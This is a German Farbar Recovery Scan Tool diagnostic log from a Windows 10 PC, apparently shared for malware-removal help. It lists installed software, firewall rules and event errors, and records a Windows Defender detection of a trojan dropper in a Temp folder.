2020-12-16 11:01 - 2018-12-17 10:54 - 000000000 ____D C:\Users\buskr5\AppData\Local\PlaceholderTileLogoFolder

2020-12-14 08:49 - 2018-12-17 11:06 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

2020-12-10 09:12 - 2019-09-16 11:29 - 000000000 ___RD C:\Users\buskr5\Desktop\Schulkinder
 

==================== SigCheck ============================
 

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
 

==================== Ende von FRST.txt ========================

Addition Log:

Code:

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 05-01-2021

durchgeführt von ***** (09-01-2021 15:09:43)

Gestartet von C:\Users\*****\Downloads

Windows 10 Pro Version 20H2 19042.685 (X64) (2020-07-16 07:02:22)

Start-Modus: Normal

==========================================================
 
 

==================== Konten: =============================
 

Administrator (S-1-5-21-4192198180-2913720414-2796424460-500 - Administrator - Disabled)

buskr5 (S-1-5-21-4192198180-2913720414-2796424460-1002 - Limited - Enabled) => C:\Users\buskr5

DefaultAccount (S-1-5-21-4192198180-2913720414-2796424460-503 - Limited - Disabled)

Gast (S-1-5-21-4192198180-2913720414-2796424460-501 - Limited - Disabled)

***** (S-1-5-21-4192198180-2913720414-2796424460-1001 - Administrator - Enabled) => C:\Users\*****

WDAGUtilityAccount (S-1-5-21-4192198180-2913720414-2796424460-504 - Limited - Disabled)
 

==================== Sicherheits-Center ========================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
 

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 

==================== Installierte Programme ======================
 

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
 

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)

Ahnenblatt 3.02 (HKLM-x32\...\Ahnenblatt 3_is1) (Version: 3.2.1.1 - Dirk Böttcher)

ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 10.100.404.117 - Alps Electric)

Apple Application Support (32-Bit) (HKLM-x32\...\{9738288C-21BC-4F54-AB4F-72F059339376}) (Version: 8.6 - Apple Inc.)

Apple Application Support (64-Bit) (HKLM\...\{DEB339C1-2687-43AB-816A-8714F3E26846}) (Version: 8.6 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{C788AE25-3D4E-4D18-811B-3219F778487E}) (Version: 13.5.1.2 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.)

Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)

DATEV Belegtransfer V.3.5 (HKLM-x32\...\{EC561A24-754E-44F1-B76F-2FDA3DF9E912}) (Version: 2.03 - DATEV eG)

DisplayLink Graphics Driver (HKLM\...\{113EF6B6-57CF-41EA-9F1B-BA50345EDEA5}) (Version: 9.0.1651.0 - DisplayLink Corp.)

Eumex 800 V1.30 (HKLM-x32\...\{FACE9D51-E374-4DDB-857C-816FCB1D6B40}) (Version: 1.30.0000 - T-Home) Hidden

Eumex 800 V1.30 (HKLM-x32\...\InstallShield_{FACE9D51-E374-4DDB-857C-816FCB1D6B40}) (Version: 1.30.0000 - T-Home)

Eumex RNDIS64 Treiber V1.02 (HKLM\...\{293C4FDD-FB80-48F8-8B40-F085392FDAA1}) (Version: 1.02.0000 - Deutsche Telekom)

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)

Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden

HP Dropbox Plugin (HKLM-x32\...\{1E18E86D-632C-48B5-962C-B60C2E53A478}) (Version: 36.0.41.58587 - HP)

HP Google Drive Plugin (HKLM-x32\...\{039DDA62-50CC-4E7F-9D54-7CF032A2D362}) (Version: 36.0.41.58587 - HP)

HP OfficeJet Pro 7740 series - Grundlegende Software für das Gerät (HKLM\...\{D2C5832A-0287-445C-845F-E53F332C8A18}) (Version: 40.12.1161.1896 - HP Inc.)

HP OfficeJet Pro 7740 series Hilfe (HKLM-x32\...\{5DA0FF5D-80F6-406A-A385-033BA7CBE6B8}) (Version: 39.0.0 - HP)

Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 24.20.100.6290 - Intel Corporation)

iTunes (HKLM\...\{D63C9A58-8F6C-4765-A7B7-6F7711707F46}) (Version: 12.10.8.5 - Apple Inc.)

KOBIL CCID driver x64x86 (HKLM-x32\...\{C5CBEBFF-3DB4-4271-A706-757BBE3BD5AE}) (Version: 1.018.03071 - KOBIL Systems) Hidden

MediaHuman YouTube to MP3 Converter 3.9.9.46 (HKLM-x32\...\MediaHuman YouTube to MP3 Converter_is1) (Version: 3.9.9.46 - MediaHuman)

Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.13426.20404 - Microsoft Corporation)

Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)

Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )

Microsoft OneDrive (HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)

Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)

Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27027 (HKLM-x32\...\{fd9b6070-d13e-45dc-819b-41806bf45b6b}) (Version: 14.16.27027.1 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27027 (HKLM-x32\...\{39e28474-b67b-4209-af1b-e9ad0a83d8ca}) (Version: 14.16.27027.1 - Microsoft Corporation)

Mietbus (HKLM-x32\...\ST4UNST #1) (Version:  - )

Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8816.1 - Realtek Semiconductor Corp.)

Shrew Soft VPN Client (HKLM\...\Shrew Soft VPN Client) (Version:  - )

Sicherheitspaket compact (HKLM-x32\...\{0FA40302-24BC-4235-8717-CCAB7D5A3AC2}) (Version: 6.8.102.20294 - DATEV eG) Hidden

Sicherheitspaket compact (HKLM-x32\...\{480df3d6-f2a5-4f2c-8ee3-3079eefa1c61}) (Version: 6.8.102.20294 - DATEV eG)

Sicherheitspaket compact VDST (HKLM-x32\...\{1277C975-FD21-4782-BFD3-6D7BAB7AF466}) (Version: 6.1.100.18178 - DATEV eG) Hidden

Sicherheitspaket compact x64 (HKLM\...\{FE909D88-4863-45D2-9FFB-61CB2DD592F0}) (Version: 6.8.102.20294 - DATEV eG) Hidden

TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.12.4 - TeamViewer)

Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden

Windows-Treiberpaket - T-Home Net  (06/30/2010 6.0.6000.16384) (HKLM\...\7B73EBFEF26F2C40D3AA9D389F5CF2C77121106C) (Version: 06/30/2010 6.0.6000.16384 - T-Home)
 

Packages:

=========

Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe [2020-07-16] (Microsoft Corporation) [MS Ad]
 

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Keine Datei

ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxDTCM.dll [2018-11-14] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
 

==================== Codecs (Nicht auf der Ausnahmeliste) ====================
 

==================== Verknüpfungen & WMI ========================
 

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
 

2013-07-01 00:17 - 2013-07-01 00:17 - 000017920 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libdtp.dll

2013-07-01 00:15 - 2013-07-01 00:15 - 000022016 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libidb.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000628224 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libike.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000116736 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libip.dll

2013-07-01 00:15 - 2013-07-01 00:15 - 000018432 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libith.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000013312 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\liblog.dll

2013-07-01 00:17 - 2013-07-01 00:17 - 000029184 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libpfk.dll

2013-07-01 00:17 - 2013-07-01 00:17 - 000035840 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvflt.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000039936 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvnet.dll
 

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
 

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
 

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
 

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========
 

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)

BHO: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO64002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)

BHO-x32: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)

Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
 

==================== Hosts Inhalt: =========================
 

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
 

2018-04-12 00:38 - 2018-04-12 00:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
 

==================== Andere Bereiche ===========================
 

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
 

HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg

DNS Servers: 192.168.178.1

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )

 ist aktiviert.
 

Network Binding:

=============

Ethernet: Shrew Soft Lightweight Filter -> vflt (enabled) 

WLAN: Shrew Soft Lightweight Filter -> vflt (enabled) 
 

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
 

HKLM\...\StartupApproved\StartupFolder: => "ControlCenter.lnk"

HKLM\...\StartupApproved\Run: => "RTHDVCPL"

HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\StartupApproved\Run: => "OneDrive"
 

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

FirewallRules: [{166A50AB-BA35-4DC0-94F9-86E3C7612B7F}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxApplications.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{E39623A3-4694-43EA-861D-846DE1BBE081}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{41F20948-57E6-48C0-B787-8E350E0F4AE3}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\SendAFax.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{9EC5C841-0316-4C4C-8AC6-5D47D1515E43}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxPrinterUtility.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{2C47819B-0C76-41E7-8951-FF9884032B29}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{A528EDB2-5B14-4C19-840E-E50161882359}] => (Allow) LPort=5357

FirewallRules: [{35A9C84E-C44A-4EB6-A179-101E53499E5B}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{DF2A37A0-22B5-4F56-BEF2-D55F24A9E8A6}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{6C39964B-8607-462D-BADE-7B852BCE9A96}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{DEC7E16E-33C1-4DE9-A3C5-D9205AEE5645}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{24C9FA9C-13A2-43E7-A79D-703A70335C05}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{65C8E351-555D-4A86-9AB3-CD29636B7DA9}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{E69D8B9E-7CEB-410C-8145-C81E4CCB8E77}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{BC66B58C-B648-4497-889E-7FB43E3E140B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{9CF1E217-96B2-4C50-B89D-32E490BC3A5D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{C0B9ABF0-C6CA-44B7-9DF8-6AE21BACF8B7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{EBD4A9EA-A5CF-42F3-999B-FC71F044B516}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [TCP Query User{6A280486-017D-4867-948B-EF1175A2B9A1}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei

FirewallRules: [UDP Query User{3098913F-3817-46A9-B646-AEE9F468614B}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei

FirewallRules: [{24B5A986-5521-4ED0-9467-91D2225031A8}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)

FirewallRules: [{7510E694-223F-4E51-80DD-869688F9BE1F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{5EDC0426-307F-4140-BC21-6F42F1A6D414}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{ACF9D1E2-41C9-4BCA-BFDE-C58E7AEB1799}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{9C443C88-A482-48E0-A390-269EC8292DA5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{C2472821-64AA-418D-B658-F3DC8B7D5DC9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 

==================== Wiederherstellungspunkte =========================
 

21-12-2020 07:06:20 Geplanter Prüfpunkt

28-12-2020 10:50:36 Geplanter Prüfpunkt

06-01-2021 10:37:08 Geplanter Prüfpunkt
 

==================== Fehlerhafte Geräte im Gerätemanager ============
 

Name: Shrew Soft Virtual Adapter

Description: Shrew Soft Virtual Adapter

Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}

Manufacturer: Shrew Soft

Service: vnet

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 

==================== Fehlereinträge in der Ereignisanzeige: ========================
 

Applikationsfehler:

==================

Error: (01/07/2021 06:49:16 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)

Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).
 

Error: (01/02/2021 03:32:14 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Name der fehlerhaften Anwendung: ImagingDevices.exe, Version: 10.0.19041.1, Zeitstempel: 0x5fcdec8b

Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000

Ausnahmecode: 0xc0000005

Fehleroffset: 0x03233f2e

ID des fehlerhaften Prozesses: 0x285c

Startzeit der fehlerhaften Anwendung: 0x01d6e10e6233e2ba

Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Pfad des fehlerhaften Moduls: unknown

Berichtskennung: 3506c912-b109-489b-8830-af7cc925d766

Vollständiger Name des fehlerhaften Pakets: 

Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
 

Error: (12/31/2020 02:05:44 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 4c0
 

Startzeit: 01d6df75472ad580
 

Beendigungszeit: 0
 

Anwendungspfad: C:\Windows\explorer.exe
 

Bericht-ID: 50412b09-f1e4-4dee-b71c-7bcde27d67b3
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Unknown
 

Error: (12/31/2020 02:04:42 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm EXCEL.EXE Version 16.0.13426.20404 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 838
 

Startzeit: 01d6df7570957287
 

Beendigungszeit: 24
 

Anwendungspfad: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
 

Bericht-ID: 8d968dff-4197-40a0-80a9-beb335dfef47
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Cross-process
 

Error: (12/15/2020 10:07:01 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm Microsoft.Photos.exe Version 2020.20110.11001.0 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 2ddc
 

Startzeit: 01d6d2c180af7335
 

Beendigungszeit: 4294967295
 

Anwendungspfad: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
 

Bericht-ID: 5a8a5bfd-4e3d-4dc8-a2d5-ef7069012949
 

Vollständiger Name des fehlerhaften Pakets: Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe
 

Relative Anwendungs-ID des fehlerhaften Pakets: App
 

Absturztyp: Cross-process
 

Error: (12/15/2020 10:06:58 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 28f4
 

Startzeit: 01d6d2c07cb57be1
 

Beendigungszeit: 0
 

Anwendungspfad: C:\Windows\explorer.exe
 

Bericht-ID: c526209e-141b-49b4-a607-71cf75713d4a
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Cross-process
 

Error: (12/15/2020 09:58:42 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 2608
 

Startzeit: 01d6d2b1bd864c9b
 

Beendigungszeit: 0
 

Anwendungspfad: C:\Windows\explorer.exe
 

Bericht-ID: b520483e-c602-45e2-8fe9-15a88b5d0f17
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Unknown
 

Error: (12/10/2020 08:09:56 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )

Description: Event-ID 0
 
 

Systemfehler:

=============

Error: (01/09/2021 03:07:09 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 

Error: (01/09/2021 03:07:09 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXjytc7c0yvwb8n3cw0r82k4364sd1s7bv.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
 

Error: (01/09/2021 03:07:09 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 

Error: (01/09/2021 03:01:56 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/09/2021 03:01:56 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/09/2021 03:01:56 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/09/2021 03:01:56 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/09/2021 03:01:56 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 
 

Windows Defender:

===================================

Date: 2021-01-09 15:00:56.0110000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-07 19:07:31.1610000Z

Description: 

Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.

Überprüfungs-ID: {F826CD36-B17A-4994-843F-547ED9BF91B1}

Überprüfungstyp: Antimalware

